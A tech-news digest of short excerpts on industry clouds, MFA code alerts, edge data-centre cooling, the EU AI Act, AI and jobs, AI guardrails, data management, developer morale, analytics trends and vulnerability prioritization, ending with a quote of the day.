One of the biggest mistakes IT leaders make when shopping for an industry cloud is searching for a solution without first constructing a holistic strategy, Campbell says. He recommends focusing on areas that will maximize the overall investment value, including data management and security operations, while ensuring both business and IT buy-in. Due to multiple factors, including, compliance, business continuity, customer trust, and financial health, cybersecurity should be a central consideration when assessing industry clouds, says Nigel Gibbons, a director and partner with cyber threat consultancy NCC Group. ... Gibbons adds that it’s also important to be aware of data sovereignty requirements and the impact of laws on where and how data is stored, particularly for businesses operating internationally. To ensure tight alignment with both present and future business goals it’s important to choose a forward-looking provider, Gibbons says. “It’s essential to future-proof investments by choosing a provider that regularly innovates and updates its offerings.”


What to do when receiving unprompted MFA OTP codes

When receiving an unprompted 2FA code, the account holder should assume their credentials were stolen and log directly into Amazon, without clicking on any links in text messages or emails, to change their password. If that same password is used with any of your other accounts, it should also be changed immediately on those sites. It is also important to not think that since 2FA protected your account you no longer need to change your password. This is a false sense of security, as threat actors have figured out ways to bypass MFA in the past, so there is no reason to give them the opportunity to do so with your account. Furthermore, while SMS and email 2FA provide extra protection to your accounts, they are the most risky MFA method to use. This is because if someone gains access to your email or phone number, such as through a SIM swapping attack, they'll also have access to your OTP codes. This would allow them to reset your password without you knowing until it was too late. Instead, if a site provides support for authentication apps, hardware security keys, or passkeys, you should use one of these options instead as they’ll require attackers to have access to your device to pass the multi-factor authentication challenge.


Chilling on the Edge: Navigating the challenges of cooling Edge data centers

“In order to manage the complete value supply chain for critical Edge applications, service support is critical for our end user customers. Our products are designed with full consideration of service access and maintenance processes,” he adds. With the global warming phenomenon, summer ambient temperatures are rising globally, with the UK even seeing thermometers reaching 40 degrees Celsius in some parts in recent times. “The result is that design considerations for standard products require a summer ambient operation up to 50 degrees ambient in most markets now. This can be exacerbated when we take into account microclimates, where you have a large population of equipment working together, further increasing the local ambient temperature” says Ansari. Increasingly, he adds, greenfield sites are also abandoning raised floor designs in favour of maximising the indoor cooling space and creating a larger floor-to-ceiling area. “This seems to have become the norm for Edge and, increasingly for colo,” he adds. This is ideal for our latest fan wall cooling range, AireWall ONE™, which is a parametric design suitable for horizontal airflow and configurable to maximise design options.


EU AI Act agreed: 5 key considerations for businesses for the road ahead

A company may use AI in a variety of ways, such uses falling into different risk-based categories under the AI Act. Therefore, a ‘one size fits all’ AI governance strategy may not be appropriate. When structuring an AI governance team, businesses should consider including individuals from a range of existing teams to ensure that the requirements of the AI Act can be fully met. For example, although certain requirements will be familiar to privacy teams (e.g. risk and impact assessments), when it comes to AI there is a level of technical knowledge needed relating to testing and monitoring of systems, oversight and transparency requirements. ... The AI Act will not exist in a vacuum and is not the beginning and end for AI governance. It must be read alongside other laws in the regulatory landscape e.g. GDPR. The interplay with privacy is clear, given that data is at the heart of AI systems. This inextricable link is demonstrated by, for example, the provisions in the GDPR on automated decision-making. Earlier this month we saw the first judgment where the CJEU interpreted Article 22 GDPR when deciding what constitutes ‘automated decision-making’


Unpacking The Rise of AI: Its Potential, Its Disruptions, and What It Entails in the Near Future

The timely and cost-effective results produced by AI have already made a host of businesses replace their human resources with technology, while many others have started contemplating the same. One of the recent examples is the replacement of humans with bots in customer service by businesses mainly to save costs and redirect them towards their core business. AI-driven tools are also better equipped to study customer feedback and aid businesses and business leaders in identifying customer preferences and making informed decisions. Meanwhile, AI has also found its way into the healthcare and finance sectors. In healthcare, AI has improved diagnostics, personalised treatment plans, and drug discovery, fostering more effective and targeted medical interventions. In finance, AI algorithms analyse vast datasets to enhance decision-making, risk management, and fraud detection. Moreover, according to Goldman Sachs, about 300 million people could potentially lose their jobs due to automation and technologies like generative AI. Consequently, there are concerns among professionals and aspiring students about the potential automation within their domains and the resultant loss of work.


Surviving the cyber arms race in the age of generative AI

It's critical that industry and government continually evaluate the guardrails in place to protect the public from unrestrained use of AI, whether by cybercriminals or established organizations. The EO promises to develop standards that will ensure AI systems are safe and tested against a rigorous set of qualifications. These qualifications and standards will require refinement over time to become truly standardized. The US Department of Commerce will also develop guidance for watermarking and content authentication to clearly label AI-generated content, while companies like Alphabet, Meta, and OpenAI have already made commitments to implement such measures. This approach is resonant with how the US Secret Service got manufacturers of color copiers and printers to include digital watermarks on printed pages after the copiers became advanced enough to counterfeit money. However, it does bring its own unique set of challenges for bad actors to misuse. To ensure the responsible development and deployment of AI technologies, the evolution of our legislative framework must continue. With transparency, visibility, and understanding as cornerstones, the tech industry and government can work together to mitigate risk and counteract threats.


Building A Lasting Data Management Strategy Requires A Data-First Mindset

Without the data owners' participation, this project won't work. They're the experts in the processes underpinned by the data, whether it’s procurement, marketing, production or another department. They bring a functional view to the project. The migration is just a means to an end. If you don’t do it in the context of the business process, you’re just moving ones and zeros. There’s no value creation. The other side of the coin is the technical people, those who work closely with the line of business owners to execute the migration. These are the IT people who understand the tools, the steps and what needs to happen next. ... As IT and business teams struggle to do more with less, there'll be increased pressure to make the ROI case even before purchasing new tools. Historically, there's been a missing link between tool implementation and recognition at the executive level of the tool’s importance. Data management is a technical challenge for many enterprises, one that's primarily internal. Poor governance and a lack of monitoring are the primary factors cited as the causes of faulty data. As a result, the opportunity resides in a more comprehensive grasp of data and a more potent means of driving change so that data matches up with corporate goals.


9 ways to keep your developer team happy

Good feedback is important in any type of job, and software development is no different. Programmers want to know how they are doing and what they could do to improve. Developers also want to know whether the products they create are beneficial to users and profitable for their companies. An important part of feedback is recognition. This can be informal, such as a team leader paying a compliment for a successful project, or formal, such as a reward or perk for work well done. Public recognition among peers is also important. “Regular recognition and constructive feedback for their contributions are essential for a developer's happiness,” James says. “Feeling appreciated and acknowledged for their hard work and expertise can significantly boost job satisfaction.” ... Developers want to work on projects that push the edge of innovation, such as software that leverages AI and machine learning capabilities. They also want to build products that make a difference. Knowing that their organization stands out in the market is a source of pride and satisfaction. Developers "feel happy when they are allowed to work on innovative solutions,” says Vinika Garg, COO of Webomaze, an SEO agency.


The Three Most Important Emerging AI Trends in Data Analytics

As AI-enabled applications performing analytics are spun up, it is increasingly critical that the training and production data sets are unbiased and incorruptible. Bad training or production data sets that are biased or just out of date can lead the system to make bad recommendations and worse decisions. Ensuring the safety of the data includes a legal process (asking the firm to guarantee that the data in the repository isn’t owned by someone else who might take exception to its use) and some form of indemnification. The use of indemnification isn’t consistent, however, with some of the more mature firms indemnifying their customers and some of the other firms asking for indemnification from their customers. ... AI is very expensive to run in the cloud because it uses substantial processing and storage resources. However, if you can shift the load to the client, it frees up those resources and allows for faster results with some loss of trainability and customization as, typically, the clients use a compressed data set and inferencing that is more limited than the capabilities of a cloud implementation. 


Creating a formula for effective vulnerability prioritization

Systems should operate continuously and collect live data to drive vulnerability prioritization efforts based on actual usage. Traditional vulnerability systems, on the other hand, typically collect information periodically – on-demand, weekly, and even monthly. However, the lack of current exposure context can lead to resourcing and security gaps. This causes a significant human resource overhead and creates security gaps since the information doesn’t present a current map of the organization’s exposure. Automated and continuous prioritization adapts to a dynamically changing attack surface. In turn, teams gain greater accuracy with less reliance on manual data collection and analysis. Automated systems allow for greater capacity to digest more (and higher priority) data and better leverage existing resources. In parallel, organizations should consider deploying patchless protection to reduce their attack surface until patches are deployed. Patchless protection protects known vulnerabilities that haven’t been patched yet while preventing unknown vulnerabilities from causing damage.



Quote for the day:

“If you don’t value your time, neither will others. Stop giving away your time and talents. Value what you know & start charging for it.” -- Kim Garst